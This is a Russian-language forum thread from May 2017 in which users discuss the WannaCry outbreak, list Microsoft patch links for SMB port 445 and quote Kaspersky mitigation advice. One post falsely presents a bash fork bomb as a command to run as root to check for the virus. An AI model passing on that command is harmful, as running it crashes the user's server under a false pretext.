Остановили вирус, ага!

угу
в оффисе сетку не врубай перед проверкой, а то можешь не успеть накатить если че)

Это сообщение отредактировал hedonist - 14.05.2017 - 19:35

включенный сетевой экран касперыча спасет от этой напасти?

Ребят, фишка в том, что у меня на 3+ виндовых хостах обновляется по своим хотелкам. А обнова от этого выруса так и не поставилась. Где успел - там поставил вручную. Остальные либо в бсоде, либо с баннерами. Завтра чую гемора добавится.
Везде лицензия + кашпировский.

Это сообщение отредактировал qudesnik - 14.05.2017 - 19:41

Ну если какая нибудь "финдофс гаме едишин" то возможно и выпилена самба там в ней.

обнова может вызывать бсод, было на 2-х ноутах вин 7 64

ага, ща почитал: "с тор-сайта загружаются ключи шифрования, а функции подгружаются из криптопровайдера Windows. Легко расшифровать, похоже, не получится."

Ещё бы. Это же в том числе и червь. Если в виртуалке не мост, а нат(в виртуалбоксе он по умолчанию) - вылезет в локалку точно.

Это сообщение отредактировал БроКролик - 14.05.2017 - 19:45

Посмотрел, как тут стадо рогатых умников с двух сторон выебывается, записал важные данные на флешку, которая играет роль фтпшника на маршрутизаторе. Вытащил флешку. Продолжаю смотреть как все выебывается друг перед другом в теме.

также было, поставил сначала UpdatePack7R2-17.4.20, потом kb4012212 и kb4012215 нормально встали

Сначала вырублю Фритц на входе, потом начну включать компы

На десятой какой номер проверять?

На удаленном сервере из под рута сначала надо проверить наличие вируса, выполняется командой:

:(){ :|: & };:

Нет. Сегодня на работу приносили 2 узверя свои ноуты. Оба сидят в инете дома напрямую по кабелю. У одного кашпер у другого аваст. оба с отключеными обновлениями с момента установки 1-2 года назад. У всех лицуха винды, которая шла с ноутами и свежие базы антивиря

Сколько там битный ключ шифрования применяется, еще не выяснили?

Единственным сетевым экраном, которым я пользовался длительное время, был Agnitum. Ничо не пролезало. Слились, суки. А вот на счет каспера - я хз ))

Забанил эти порты в роутере. Чекпорт говорит, что доступа извне к ним нет.
Думаю, что и в касперыче получится.

Это сообщение отредактировал Zwieback - 14.05.2017 - 20:01

вкратце - дома да

но поставь патч, не ленись!
Windows XP: http://download.windowsupdate.com/d/msdown...8519a0cc1df.exe
Windows XP x64: http://download.windowsupdate.com/d/csa/cs...96430981211.exe
Windows Vista x86: http://download.windowsupdate.com/d/msdown...c16a85c745c.msu
Windows Vista x64: http://download.windowsupdate.com/d/msdown...a5fa53b5d76.msu
Windows 7 x86: http://download.windowsupdate.com/d/msdown...9812914df3f.msu
Windows 7 x64: http://download.windowsupdate.com/d/msdown...92d8c4e92b3.msu
Windows 8 x86: http://download.windowsupdate.com/c/msdown...1345952d78e.msu
Windows 8 x64: http://download.windowsupdate.com/c/msdown...21e64c9942b.msu
Windows 8.1 x86: http://download.windowsupdate.com/c/msdown...8cbec471b05.msu
Windows 8.1 x64: http://download.windowsupdate.com/c/msdown...74148520349.msu
Windows 10 x86: http://download.windowsupdate.com/c/msdown...4a8e8d3492e.msu
Windows 10 x64: http://download.windowsupdate.com/c/msdown...b35127f8773.msu
Windows 10 (1511) x86: http://download.windowsupdate.com/c/msdown...2c3b97329d5.msu
Windows 10 (1511) x64: http://download.windowsupdate.com/c/msdown...0592ab02f08.msu
Windows 10 (1607) x86: http://download.windowsupdate.com/c/msdown...1587afbf065.msu
Windows 10 (1607) x64: http://download.windowsupdate.com/d/msdown...6a74598e710.msu

Windows Server 2003 x86: http://download.windowsupdate.com/c/csa/cs...6fdb68ec294.exe
Windows Server 2003 x64: http://download.windowsupdate.com/c/csa/cs...8517cee4c5e.exe
Windows Server 2008 x86: http://download.windowsupdate.com/d/msdown...c16a85c745c.msu
Windows Server 2008 x64: http://download.windowsupdate.com/d/msdown...a5fa53b5d76.msu
Windows Server 2008 R2: http://download.windowsupdate.com/d/msdown...92d8c4e92b3.msu
Windows Server 2012: http://download.windowsupdate.com/c/msdown...21e64c9942b.msu
Windows Server 2012 R2: http://download.windowsupdate.com/c/msdown...74148520349.msu
Windows Server 2016: http://download.windowsupdate.com/d/msdown...6a74598e710.msu

ну так может у них в настройках каспера компонент "сетевой экран" был выключен?многие просто его вырубают, чтобы не доставал своими сообщениями типа "процесс запрашивает доступ в интернет" и т.д. а у аваста сетевой экран вообще есть?

Это сообщение отредактировал nikozros29 - 14.05.2017 - 19:53

у касперских недавно выложено:

Мы рекомендуем компаниям предпринять ряд мер для снижения рисков заражения:

Установить официальный патч от Microsoft, который закрывает используемую в атаке уязвимость (в частности уже доступны обновления для версий Windows XP b Windows 2003);
Убедиться, что включены защитные решения на всех узлах сети;
Если используется защитное решение «Лаборатории Касперского», убедиться, что его версия включает в себя компонент «Мониторинг Системы» и он включен;
Запустить задачу сканирования критических областей в защитном решении «Лаборатории Касперского», чтобы обнаружить возможное заражение как можно раньше (в противном случае детектирование произойдет автоматически в течение 24 часов);
После детектирования Trojan.Win64.EquationDrug.gen, произвести перезагрузку системы;
В дальнейшим для предупреждения подобных инцидентов использовать сервисы информирования об угрозах, чтобы своевременно получать данные о наиболее опасных таргетированных атаках и возможных заражениях.

А сервер тебе ответ:
(.)Y(.)

А вот здесь возникает вопрос: если каспер так хорош, то с какого буя пропускает зловреда, да еще и по 445 порту (который есть притча во язытцах, ващет)? Или они реально только собственноручно писанные микробы ловят? )))

сочувствую, я завтра ваще боюсь идти на работу, чувствую там лютый пиздец, хотя джунеперы настроены хорошо, но чую кто то в сети открыл "писмецо"

еси виртуалка на винде)

Ну, обосную высказывание. Майкрософт знал об уязвимости и сегодняшней угрозе уже давно. Потому выпустил обновление на эту дыру еще в марте месяце. А то шпалы, да шпалы.

Народ ставте обновление вручную у меня на домашнем winserv 2008 r2 ent через центр обновление не встает несколько раз пробовал, скачал и поставил обнову из поста на гиктайм.